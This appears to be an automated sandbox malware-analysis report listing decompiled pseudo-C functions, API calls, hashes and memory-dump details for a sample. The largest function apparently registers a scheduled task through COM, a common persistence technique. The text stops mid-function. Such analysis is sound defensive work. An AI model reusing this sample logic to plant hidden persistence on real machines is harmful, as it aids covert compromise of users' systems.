Opcode ID: b8d621d44d2a7a4e203dda9c37677e824b32356e827b76855ca0c6ecfdf2e746
Instruction ID: d455cdcaaad30b8144c76cde5c2dbd573904ce996ccd697bb0f403fecd656046
Opcode Fuzzy Hash: b8d621d44d2a7a4e203dda9c37677e824b32356e827b76855ca0c6ecfdf2e746
Instruction Fuzzy Hash: BDE0653110162556E7B13A6DAC00F7B7E8DDF41FE8F850121AE1596590DF60D80186E5

Uniqueness

Uniqueness Score: -1.00%

Function 01356313, Relevance: 1.5, APIs: 1, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E01356313(intOrPtr _a4, intOrPtr _a8) {
				void* _t9;
				intOrPtr* _t11;

				_t11 = E01355E1D();
				if(_t11 == 0) {
					return E013563D2(GetUserDefaultLCID(), _a4, _a8, 0);
				}
				 *0x1374358(_a4, _a8); // executed
				_t9 =  *_t11(); // executed
				return _t9;
			}

0x0135631e
0x01356322
0x00000000
0x01356345
0x0135632c
0x01356332
0x00000000

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,00000000,?,?,0135DBB6,?,00000055,00000050), ref: 0135633E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: DefaultUser
String ID:
API String ID: 3358694519-0
Opcode ID: ee10e432942621a66d0e6859eacd422004cf4a13558b634b4d66c8d27c252951
Instruction ID: ae0445f0876bdb0406fd13aca8d322c5250d4a479be2ba1bc2ba6c426de9130a
Opcode Fuzzy Hash: ee10e432942621a66d0e6859eacd422004cf4a13558b634b4d66c8d27c252951
Instruction Fuzzy Hash: 3EE04F325001287BCB722A64DC09D9DBF1DAB50BA5F058021FD195A121CA3199619B80

Uniqueness

Uniqueness Score: -1.00%

Function 01315BF0, Relevance: 1.3, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E01315BF0(void* __ebx, void* __ecx) {
				void* __edi;
				void* _t22;
				void* _t27;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t47;
				void* _t48;

				_t36 = __ebx;
				_t47 = __ecx; // executed
				__imp__CoUninitialize(); // executed
				_t38 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t38 != 0) {
					_push(_t38);
					E012F5650(_t38,  *((intOrPtr*)(__ecx + 0x14)));
					_push((0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2)) * 2 << 3);
					_t22 = E012F56A0(__ebx, __ecx,  *((intOrPtr*)(__ecx + 0x10)));
					 *((intOrPtr*)(_t47 + 0x10)) = 0;
					_t48 = _t48 + 0xc;
					 *((intOrPtr*)(_t47 + 0x14)) = 0;
					 *((intOrPtr*)(_t47 + 0x18)) = 0;
				}
				_t39 =  *((intOrPtr*)(_t47 + 4));
				if(_t39 != 0) {
					_push(_t39);
					E01316850(_t39,  *((intOrPtr*)(_t47 + 8)));
					_push( *((intOrPtr*)(_t47 + 0xc)) -  *((intOrPtr*)(_t47 + 4)) & 0xffffffe0);
					_t27 = E012F56A0(_t36, _t47,  *((intOrPtr*)(_t47 + 4)));
					 *((intOrPtr*)(_t47 + 4)) = 0;
					 *((intOrPtr*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0xc)) = 0;
					return _t27;
				}
				return _t22;
			}

0x01315bf0
0x01315bf1
0x01315bf3
0x01315bf9
0x01315bfe
0x01315c03
0x01315c04
0x01315c26
0x01315c2a
0x01315c2f
0x01315c36
0x01315c39
0x01315c40
0x01315c40
0x01315c47
0x01315c4c
0x01315c51
0x01315c52
0x01315c62
0x01315c64
0x01315c69
0x01315c73
0x01315c7a
0x00000000
0x01315c7a
0x01315c82

APIs

CoUninitialize.OLE32(?,01310A7A), ref: 01315BF3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 58e32507c752c0015668c2230039418e3e4c2c12154045761f2b3d8478482d36
Instruction ID: 225ddaca1eeb042809473ed486e6c149716e09d896c0ee2412d29e6aad0c4817
Opcode Fuzzy Hash: 58e32507c752c0015668c2230039418e3e4c2c12154045761f2b3d8478482d36
Instruction Fuzzy Hash: D101EDB5210A02ABD31CDF29D955B26FBB5BF90314F04872CD5258BA84C775F564CBD0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012FAEE0, Relevance: 64.0, APIs: 35, Strings: 1, Instructions: 955
memorycomCOMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

			E012FAEE0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				unsigned int _v32;
				char _v33;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v136;
				signed int _v140;
				short _v144;
				signed int _v152;
				char _v160;
				signed int _v168;
				signed int _v176;
				signed int _v184;
				char _v192;
				signed int _v196;
				signed int _v200;
				short _v216;
				signed int _v220;
				char _v240;
				char _v256;
				char _v264;
				short* _v428;
				char _v448;
				signed int _v452;
				char _v484;
				intOrPtr _v516;
				char _v520;
				short* _v528;
				short* _v560;
				signed int _v568;
				signed int* _v584;
				char _v600;
				intOrPtr _v604;
				char _v617;
				intOrPtr _v628;
				unsigned int _v632;
				intOrPtr _v640;
				intOrPtr _v652;
				void* __esi;
				void* __ebp;
				intOrPtr _t448;
				signed int _t450;
				signed int _t451;
				char _t453;
				signed int* _t456;
				void* _t471;
				signed int _t480;
				signed int _t483;
				signed int _t490;
				signed int _t491;
				intOrPtr _t498;
				signed int _t499;
				signed int _t507;
				signed int _t521;
				signed int _t524;
				signed int* _t531;
				short* _t542;
				void* _t549;
				signed int _t551;
				signed int _t561;
				void* _t574;
				signed int _t576;
				signed int _t585;
				signed int _t587;
				void* _t590;
				signed int _t591;
				signed int _t592;
				signed int _t602;
				void* _t605;
				intOrPtr* _t610;
				signed int* _t611;
				signed int _t612;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t622;
				signed int _t625;
				signed int _t626;
				signed int _t628;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t641;
				intOrPtr* _t647;
				signed int* _t648;
				signed int _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t656;
				intOrPtr* _t662;
				signed int* _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				signed int _t669;
				signed int _t671;
				signed int _t672;
				signed int _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t684;
				signed int* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t690;
				signed int _t693;
				signed int _t694;
				signed int _t697;
				intOrPtr* _t699;
				signed int* _t700;
				signed int _t701;
				signed int _t708;
				signed int _t712;
				intOrPtr* _t717;
				intOrPtr* _t719;
				signed int _t721;
				signed int _t724;
				signed int _t725;
				signed int _t728;
				signed int _t729;
				intOrPtr* _t739;
				signed int _t741;
				signed int _t742;
				signed int _t751;
				signed int _t752;
				intOrPtr* _t755;
				signed int _t761;
				signed int _t762;
				signed int _t765;
				signed int _t766;
				signed int _t771;
				signed int _t772;
				void* _t775;
				void* _t780;
				signed int _t782;
				signed int _t783;
				signed int _t791;
				signed int _t799;
				signed int _t804;
				signed int _t805;
				signed int _t807;
				char _t808;
				signed int _t812;
				unsigned int _t813;
				signed int _t819;
				signed int _t820;
				unsigned int _t821;
				short* _t829;
				intOrPtr* _t830;
				intOrPtr* _t832;
				intOrPtr* _t833;
				intOrPtr* _t834;
				intOrPtr* _t835;
				intOrPtr* _t837;
				intOrPtr* _t840;
				intOrPtr* _t841;
				signed int _t842;
				intOrPtr* _t843;
				intOrPtr* _t845;
				intOrPtr* _t846;
				intOrPtr* _t847;
				intOrPtr* _t853;
				intOrPtr* _t854;
				signed int _t855;
				intOrPtr* _t856;
				signed int _t857;
				signed int _t860;
				signed int _t866;
				signed int _t867;
				intOrPtr* _t868;
				intOrPtr _t875;
				unsigned int _t877;
				unsigned int _t878;
				intOrPtr* _t901;
				signed int _t902;
				short* _t903;
				signed char* _t905;
				signed int _t907;
				intOrPtr _t908;
				signed int _t917;
				intOrPtr* _t918;
				void* _t920;
				intOrPtr* _t921;
				signed int _t923;
				signed int _t924;
				void* _t925;
				signed char* _t927;
				signed int _t928;
				intOrPtr _t929;
				intOrPtr _t930;
				signed int _t932;
				void* _t934;
				signed int _t937;
				void* _t939;
				signed int _t941;
				intOrPtr* _t944;
				signed int _t945;
				intOrPtr* _t949;
				signed int _t950;
				intOrPtr* _t952;
				signed int _t953;
				intOrPtr* _t956;
				signed int _t957;
				signed int _t963;
				signed int _t965;
				void* _t967;
				void* _t968;
				void* _t978;
				signed int _t981;
				void* _t982;
				void* _t988;
				signed int _t989;
				void* _t991;
				void* _t992;
				void* _t995;
				void* _t1015;

				_t875 = _a4;
				if( *((intOrPtr*)(_t875 + 0x10)) == 0) {
					L3:
					return _t448;
				} else {
					_t448 = _a8;
					if( *((intOrPtr*)(_t448 + 0x10)) == 0) {
						goto L3;
					} else {
						_a8 = _t448;
						_a4 = _t875;
						_pop(_t961);
						_push(__ebx);
						_t780 = _t978;
						_t981 = (_t978 - 0x00000008 & 0xfffffff8) + 4;
						_v8 =  *((intOrPtr*)(_t780 + 4));
						_t963 = _t981;
						_push(0xffffffff);
						_push(0x13662bc);
						_push( *[fs:0x0]);
						_push(_t780);
						_t982 = _t981 - 0xe8;
						_t450 =  *0x13a4018; // 0x39cca9f6
						_t451 = _t450 ^ _t963;
						_v32 = _t451;
						_push(__edi);
						_push(_t451);
						 *[fs:0x0] =  &_v24;
						_t453 =  *((intOrPtr*)(_t780 + 8));
						_t791 =  *(_t780 + 0xc);
						_t876 =  *((intOrPtr*)(_t780 + 0x10));
						_v112 = _t453;
						_v96 = _t791;
						_v100 = _t876;
						if( *((intOrPtr*)(_t453 + 0x10)) == 0 || _t876 == 0 ||  *((intOrPtr*)(_t791 + 0x10)) == 0) {
							L73:
							goto L74;
						} else {
							__imp__CoInitializeEx(0, 0);
							__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
							_t456 =  &_v48;
							_v48 = 0;
							__imp__CoCreateInstance(0x1378f5c, 0, 1, 0x1378f4c, _t456);
							if(_t456 < 0) {
								goto L73;
							} else {
								_t921 = __imp__#8;
								 *_t921( &_v256);
								_v20 = 0;
								asm("movups xmm0, [ebp-0xf0]");
								asm("movups [ebp-0xd8], xmm0");
								 *_t921( &_v160);
								asm("movups xmm0, [ebp-0x90]");
								asm("movups [ebp-0xc0], xmm0");
								 *_t921( &_v176);
								asm("movups xmm0, [ebp-0xa0]");
								asm("movups [ebp-0x78], xmm0");
								 *_t921( &_v192);
								_v20 = 3;
								asm("movups xmm0, [ebp-0xd8]");
								asm("movups [eax], xmm0");
								asm("movups xmm0, [ebp-0xc0]");
								asm("movups [eax], xmm0");
								_t988 = _t982 - 0xffffffffffffffe0;
								asm("movups xmm0, [ebp-0x78]");
								asm("movups [eax], xmm0");
								asm("movups xmm0, [ebp-0xb0]");
								asm("movups [eax], xmm0");
								_t471 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x28))))(_v48);
								_t901 = __imp__#9;
								_t922 = _t471;
								 *_t901( &_v192);
								 *_t901( &_v176);
								 *_t901( &_v160);
								_v20 = 0xffffffff;
								 *_t901( &_v256);
								_t480 = _v48;
								_t1023 = _t471;
								if(_t471 < 0) {
									L72:
									 *((intOrPtr*)( *_t480 + 8))(_t480);
									goto L73;
								} else {
									_v44 = 0;
									_t902 =  *( *_t480 + 0x1c);
									_t483 = E0132EA8A(_t922, _t1023, 0xc);
									_t923 = _t483;
									_t989 = _t988 + 4;
									_v96 = _t923;
									_v20 = 4;
									if(_t923 == 0) {
										_t923 = 0;
										__eflags = 0;
										L13:
										_v20 = 0xffffffff;
										_v96 = _t923;
										if(_t923 == 0) {
											goto L162;
										} else {
											_v20 = 5;
											_t605 =  *_t902(_v48,  *_t923,  &_v44);
											_v20 = 0xffffffff;
											_v109 = _t605 < 0;
											_t902 = _t902 | 0xffffffff;
											asm("lock xadd [esi+0x8], eax");
											if(_t902 == 1) {
												_t775 =  *_t923;
												if(_t775 != 0) {
													__imp__#6(_t775);
													 *_t923 = 0;
												}
												_t776 =  *(_t923 + 4);
												if( *(_t923 + 4) != 0) {
													L0132ECE6(_t776);
													_t989 = _t989 + 4;
													 *(_t923 + 4) = 0;
												}
												_push(0xc);
												E0132EABA(_t923);
												_t989 = _t989 + 8;
											}
											if(_v109 == 0) {
												_t944 =  *((intOrPtr*)( *_v44 + 0x3c));
												_t610 = _v116;
												_t830 = _t610;
												__eflags =  *((intOrPtr*)(_t610 + 0x14)) - 8;
												if(__eflags >= 0) {
													_t830 =  *_t610;
												}
												_t611 = E012F9580( &_v96, __eflags, _t830);
												_v20 = 6;
												_t612 =  *_t611;
												__eflags = _t612;
												if(_t612 == 0) {
													_t613 = 0;
													__eflags = 0;
												} else {
													_t613 =  *_t612;
												}
												 *_t944(_v44, _t613, 0);
												_v20 = 0xffffffff;
												_t945 = _v96;
												__eflags = _t945;
												if(_t945 != 0) {
													asm("lock xadd [esi+0x8], eax");
													__eflags = _t902 == 1;
													if(_t902 == 1) {
														__eflags = _t945;
														if(_t945 != 0) {
															_t771 =  *_t945;
															__eflags = _t771;
															if(_t771 != 0) {
																__imp__#6(_t771);
																 *_t945 = 0;
															}
															_t772 =  *(_t945 + 4);
															__eflags = _t772;
															if(_t772 != 0) {
																L0132ECE6(_t772);
																_t989 = _t989 + 4;
																 *(_t945 + 4) = 0;
															}
															_push(0xc);
															E0132EABA(_t945);
															_t989 = _t989 + 8;
														}
													}
												}
												_t832 = _v48;
												_v40 = 0;
												_t616 =  *((intOrPtr*)( *_t832 + 0x24))(_t832, 0,  &_v40);
												_t833 = _v48;
												 *((intOrPtr*)( *_t833 + 8))(_t833);
												__eflags = _t616;
												if(_t616 >= 0) {
													_t834 = _v40;
													_v64 = 0;
													_t619 =  *((intOrPtr*)( *_t834 + 0x3c))(_t834,  &_v64);
													__eflags = _t619;
													if(_t619 < 0) {
														goto L36;
													} else {
														_t835 = _v64;
														 *((intOrPtr*)( *_t835 + 0x48))(_t835, 1);
														_t622 = _v64;
														 *((intOrPtr*)( *_t622 + 8))(_t622);
														_t837 = _v40;
														_v84 = 0;
														_t625 =  *((intOrPtr*)( *_t837 + 0x1c))(_t837,  &_v84);
														__eflags = _t625;
														if(_t625 < 0) {
															L115:
															_t626 = _v44;
															goto L71;
														} else {
															_t628 = _v84;
															 *((intOrPtr*)( *_t628 + 8))(_t628);
															_t840 = _v40;
															_v68 = 0;
															_t631 =  *((intOrPtr*)( *_t840 + 0x24))(_t840,  &_v68);
															__eflags = _t631;
															if(_t631 < 0) {
																goto L115;
															} else {
																_t841 = _v68;
																_v72 = 0;
																_t633 =  *((intOrPtr*)( *_t841 + 0x28))(_t841, 2,  &_v72);
																_t842 = _v68;
																 *((intOrPtr*)( *_t842 + 8))(_t842);
																__eflags = _t633;
																if(_t633 < 0) {
																	goto L115;
																} else {
																	_t843 = _v72;
																	_v52 = 0;
																	_t636 =  *((intOrPtr*)( *_t843))(_t843, 0x1378f3c,  &_v52);
																	_t791 = _v72;
																	_t948 = _t636;
																	_t876 =  *_t791;
																	 *((intOrPtr*)( *_t791 + 8))(_t791);
																	__eflags = _t636;
																	if(__eflags < 0) {
																		goto L115;
																	} else {
																		_v96 =  *((intOrPtr*)( *_v52 + 0x24));
																		_t641 = E0132EA8A(_t948, __eflags, 0xc);
																		_t923 = _t641;
																		_t989 = _t989 + 4;
																		_v108 = _t923;
																		_v20 = 7;
																		__eflags = _t923;
																		if(_t923 == 0) {
																			_t923 = 0;
																			__eflags = 0;
																			goto L46;
																		} else {
																			asm("xorps xmm0, xmm0");
																			asm("movq [esi], xmm0");
																			 *(_t923 + 8) = 0;
																			 *(_t923 + 4) = 0;
																			 *(_t923 + 8) = 1;
																			__imp__#2(L"Trigger1");
																			 *_t923 = _t641;
																			__eflags = _t641;
																			if(_t641 == 0) {
																				goto L163;
																			} else {
																				L46:
																				_v20 = 0xffffffff;
																				_v108 = _t923;
																				__eflags = _t923;
																				if(_t923 == 0) {
																					goto L162;
																				} else {
																					_v20 = 8;
																					_v96(_v52,  *_t923);
																					_v20 = 0xffffffff;
																					asm("lock xadd [esi+0x8], eax");
																					__eflags = _t902 == 1;
																					if(_t902 == 1) {
																						_t765 =  *_t923;
																						__eflags = _t765;
																						if(_t765 != 0) {
																							__imp__#6(_t765);
																							 *_t923 = 0;
																						}
																						_t766 =  *(_t923 + 4);
																						__eflags = _t766;
																						if(_t766 != 0) {
																							L0132ECE6(_t766);
																							_t989 = _t989 + 4;
																							 *(_t923 + 4) = 0;
																						}
																						_push(0xc);
																						E0132EABA(_t923);
																						_t989 = _t989 + 8;
																					}
																					_push(_t791);
																					_t949 =  *((intOrPtr*)( *_v52 + 0x3c));
																					_t647 =  &_v144;
																					_push(_t647);
																					L167();
																					_v20 = 9;
																					__eflags =  *((intOrPtr*)(_t647 + 0x14)) - 8;
																					if(__eflags >= 0) {
																						_t647 =  *_t647;
																					}
																					_t648 = E012F9580( &_v96, __eflags, _t647);
																					_v20 = 0xa;
																					_t649 =  *_t648;
																					__eflags = _t649;
																					if(_t649 == 0) {
																						_t650 = 0;
																						__eflags = 0;
																					} else {
																						_t650 =  *_t649;
																					}
																					 *_t949(_v52, _t650);
																					_t950 = _v96;
																					__eflags = _t950;
																					if(_t950 != 0) {
																						asm("lock xadd [esi+0x8], eax");
																						__eflags = _t902 == 1;
																						if(_t902 == 1) {
																							__eflags = _t950;
																							if(_t950 != 0) {
																								_t761 =  *_t950;
																								__eflags = _t761;
																								if(_t761 != 0) {
																									__imp__#6(_t761);
																									 *_t950 = 0;
																								}
																								_t762 =  *(_t950 + 4);
																								__eflags = _t762;
																								if(_t762 != 0) {
																									L0132ECE6(_t762);
																									_t989 = _t989 + 4;
																									 *(_t950 + 4) = 0;
																								}
																								_push(0xc);
																								E0132EABA(_t950);
																								_t989 = _t989 + 8;
																							}
																						}
																						_v96 = 0;
																					}
																					_v20 = 0xffffffff;
																					_t652 = _v124;
																					__eflags = _t652 - 8;
																					if(_t652 >= 8) {
																						_push(2 + _t652 * 2);
																						E012F56A0(_t780, _t902, _v144);
																						_t989 = _t989 + 8;
																					}
																					_t845 = _v52;
																					_t654 =  *((intOrPtr*)( *_t845 + 0x54))(_t845, 1);
																					__eflags = _t654;
																					if(_t654 >= 0) {
																						_t846 = _v52;
																						_v56 = 0;
																						_t656 =  *((intOrPtr*)( *_t846 + 0x28))(_t846,  &_v56);
																						_t847 = _v52;
																						 *((intOrPtr*)( *_t847 + 8))(_t847);
																						__eflags = _t656;
																						if(_t656 < 0) {
																							goto L115;
																						} else {
																							_t952 =  *((intOrPtr*)( *_v56 + 0x20));
																							E012F8010(_t780,  &_v264, _v104, _t902);
																							asm("movups xmm0, [ebp-0xf8]");
																							asm("movups [ebp-0xe0], xmm0");
																							asm("movq xmm0, [ebp-0xe8]");
																							asm("movq [ebp-0xd0], xmm0");
																							_v20 = 0xb;
																							_push( &_v240);
																							L222();
																							_v20 = 0xc;
																							_t662 = E012F8470( &_v144,  &_v240, "M");
																							_t989 = _t989 + 8;
																							_v20 = 0xd;
																							__eflags =  *((intOrPtr*)(_t662 + 0x14)) - 8;
																							if(__eflags >= 0) {
																								_t662 =  *_t662;
																							}
																							_t663 = E012F9580( &_v96, __eflags, _t662);
																							_v20 = 0xe;
																							_t664 =  *_t663;
																							__eflags = _t664;
																							if(_t664 == 0) {
																								_t665 = 0;
																								__eflags = 0;
																							} else {
																								_t665 =  *_t664;
																							}
																							_t666 =  *_t952(_v56, _t665);
																							_t953 = _v96;
																							_v104 = _t666;
																							__eflags = _t953;
																							if(_t953 != 0) {
																								asm("lock xadd [esi+0x8], ecx");
																								__eflags = _t902 == 1;
																								if(_t902 == 1) {
																									__eflags = _t953;
																									if(_t953 != 0) {
																										_t751 =  *_t953;
																										__eflags = _t751;
																										if(_t751 != 0) {
																											__imp__#6(_t751);
																											 *_t953 = 0;
																										}
																										_t752 =  *(_t953 + 4);
																										__eflags = _t752;
																										if(_t752 != 0) {
																											L0132ECE6(_t752);
																											_t989 = _t989 + 4;
																											 *(_t953 + 4) = 0;
																										}
																										_push(0xc);
																										E0132EABA(_t953);
																										_t989 = _t989 + 8;
																									}
																								}
																								_v96 = 0;
																							}
																							_t667 = _v124;
																							__eflags = _t667 - 8;
																							if(_t667 >= 8) {
																								_push(2 + _t667 * 2);
																								E012F56A0(_t780, _t902, _v144);
																								_t989 = _t989 + 8;
																							}
																							_v128 = 0;
																							_v144 = 0;
																							_t669 = _v196;
																							_v124 = 7;
																							__eflags = _t669 - 8;
																							if(_t669 >= 8) {
																								_push(2 + _t669 * 2);
																								E012F56A0(_t780, _t902, _v216);
																								_t989 = _t989 + 8;
																							}
																							_v20 = 0xffffffff;
																							_v216 = 0;
																							_t671 = _v220;
																							_v200 = 0;
																							_v196 = 7;
																							__eflags = _t671 - 8;
																							if(_t671 >= 8) {
																								_push(2 + _t671 * 2);
																								E012F56A0(_t780, _t902, _v240);
																								_t989 = _t989 + 8;
																							}
																							_t672 = _v56;
																							 *((intOrPtr*)( *_t672 + 8))(_t672);
																							__eflags = _v104;
																							if(_v104 < 0) {
																								goto L115;
																							} else {
																								_t853 = _v40;
																								_v76 = 0;
																								_t675 =  *((intOrPtr*)( *_t853 + 0x44))(_t853,  &_v76);
																								__eflags = _t675;
																								if(_t675 < 0) {
																									goto L115;
																								} else {
																									_t854 = _v76;
																									_v80 = 0;
																									_t677 =  *((intOrPtr*)( *_t854 + 0x30))(_t854, 0,  &_v80);
																									_t855 = _v76;
																									 *((intOrPtr*)( *_t855 + 8))(_t855);
																									__eflags = _t677;
																									if(_t677 < 0) {
																										goto L115;
																									} else {
																										_t856 = _v80;
																										_v60 = 0;
																										_t680 =  *((intOrPtr*)( *_t856))(_t856, 0x1378f6c,  &_v60);
																										_t857 = _v80;
																										 *((intOrPtr*)( *_t857 + 8))(_t857);
																										__eflags = _t680;
																										if(_t680 < 0) {
																											goto L115;
																										} else {
																											_t956 =  *((intOrPtr*)( *_v60 + 0x2c));
																											_t684 = _v100;
																											__eflags =  *((intOrPtr*)(_t684 + 0x14)) - 8;
																											if(__eflags >= 0) {
																												_t684 =  *_t684;
																											}
																											_t685 = E012F9580( &_v100, __eflags, _t684);
																											_v20 = 0xf;
																											_t686 =  *_t685;
																											__eflags = _t686;
																											if(_t686 == 0) {
																												_t687 = 0;
																												__eflags = 0;
																											} else {
																												_t687 =  *_t686;
																											}
																											_t688 =  *_t956(_v60, _t687);
																											_v20 = 0xffffffff;
																											_t923 = _v100;
																											_v104 = _t688;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												asm("lock xadd [esi+0x8], ecx");
																												__eflags = _t902 == 1;
																												if(_t902 == 1) {
																													__eflags = _t923;
																													if(_t923 != 0) {
																														_t741 =  *_t923;
																														__eflags = _t741;
																														if(_t741 != 0) {
																															__imp__#6(_t741);
																															 *_t923 = 0;
																														}
																														_t742 =  *(_t923 + 4);
																														__eflags = _t742;
																														if(_t742 != 0) {
																															L0132ECE6(_t742);
																															_t989 = _t989 + 4;
																															 *(_t923 + 4) = 0;
																														}
																														_push(0xc);
																														E0132EABA(_t923);
																														_t688 = _v104;
																														_t989 = _t989 + 8;
																													}
																												}
																											}
																											__eflags = _t688;
																											if(_t688 >= 0) {
																												_t791 = _v40;
																												_t876 =  &_v88;
																												_t690 =  *((intOrPtr*)( *_t791 + 0x2c))(_t791,  &_v88);
																												__eflags = _t690;
																												if(_t690 >= 0) {
																													_t868 = _v88;
																													 *((intOrPtr*)( *_t868 + 0x98))(_t868, 0xffffffff);
																													_t791 = _v40;
																													 *((intOrPtr*)( *_t791 + 0x30))(_t791, _v88);
																												}
																												_t902 = 8;
																												_v92 = 0;
																												_v192 = 8;
																												_t693 =  *( *_v44 + 0x44);
																												_v96 = _t693;
																												__imp__#2(0x13836c0);
																												_v184 = _t693;
																												__eflags = _t693;
																												if(__eflags == 0) {
																													goto L164;
																												} else {
																													_v20 = 0x10;
																													asm("movups xmm0, [ebp-0xb0]");
																													asm("movups [ebp-0x78], xmm0");
																													_t694 = E0132EA8A(_t923, __eflags, 0xc);
																													_t957 = _t694;
																													_t989 = _t989 + 4;
																													_v108 = _t957;
																													_v20 = 0x11;
																													__eflags = _t957;
																													if(_t957 == 0) {
																														_t923 = 0;
																														__eflags = 0;
																													} else {
																														asm("xorps xmm0, xmm0");
																														asm("movq [esi], xmm0");
																														 *(_t957 + 8) = 0;
																														 *(_t957 + 4) = 0;
																														 *(_t957 + 8) = 1;
																														_t694 = E0132FAF0(_t780, 0x13836c2);
																														 *_t957 = _t694;
																													}
																													_v20 = 0x10;
																													_v108 = _t923;
																													__eflags = _t923;
																													if(_t923 == 0) {
																														goto L165;
																													} else {
																														_v20 = 0x12;
																														_v176 = _t902;
																														_t902 =  *_t923;
																														__eflags = _t902;
																														if(__eflags != 0) {
																															__imp__#149(_t902);
																															__imp__#150(_t902, _t694);
																															_v168 = _t694;
																															__eflags = _t694;
																															if(__eflags == 0) {
																																goto L162;
																															} else {
																																goto L126;
																															}
																														} else {
																															_v168 = _t902;
																															L126:
																															_v20 = 0x13;
																															asm("movups xmm0, [ebp-0xa0]");
																															asm("movups [ebp-0xc0], xmm0");
																															_t917 = E0132EA8A(_t923, __eflags, 0xc);
																															_t989 = _t989 + 4;
																															_v100 = _t917;
																															_v20 = 0x14;
																															__eflags = _t917;
																															if(_t917 == 0) {
																																_t902 = 0;
																																__eflags = 0;
																															} else {
																																asm("xorps xmm0, xmm0");
																																asm("movq [edi], xmm0");
																																 *(_t917 + 8) = 0;
																																 *(_t917 + 4) = 0;
																																 *(_t917 + 8) = 1;
																																 *_t917 = E0132FAF0(_t780, 0x13836c2);
																															}
																															_v20 = 0x13;
																															_v120 = _t902;
																															__eflags = _t902;
																															if(_t902 == 0) {
																																goto L162;
																															} else {
																																_v20 = 0x15;
																																_v160 = 8;
																																_t697 =  *_t902;
																																_v100 = _t697;
																																__eflags = _t697;
																																if(_t697 != 0) {
																																	__imp__#149(_t697);
																																	__imp__#150(_v100, _t697);
																																	_v152 = _t697;
																																	__eflags = _t697;
																																	if(_t697 == 0) {
																																		goto L166;
																																	} else {
																																		goto L132;
																																	}
																																} else {
																																	_v152 = _t697;
																																	L132:
																																	_v20 = 0x16;
																																	asm("movups xmm0, [ebp-0x90]");
																																	_v100 = _v40;
																																	_t699 = _v116;
																																	asm("movups [ebp-0xd8], xmm0");
																																	__eflags =  *((intOrPtr*)(_t699 + 0x14)) - 8;
																																	if(__eflags >= 0) {
																																		_t699 =  *_t699;
																																	}
																																	_t700 = E012F9580( &_v104, __eflags, _t699);
																																	_v20 = 0x17;
																																	_t701 =  *_t700;
																																	__eflags = _t701;
																																	if(_t701 == 0) {
																																		_t860 = 0;
																																		__eflags = 0;
																																	} else {
																																		_t860 =  *_t701;
																																	}
																																	asm("movups xmm0, [ebp-0x78]");
																																	asm("movups [eax], xmm0");
																																	_t1015 = _t989 - 0xfffffffffffffff0;
																																	asm("movups xmm0, [ebp-0xc0]");
																																	asm("movups [eax], xmm0");
																																	asm("movups xmm0, [ebp-0xd8]");
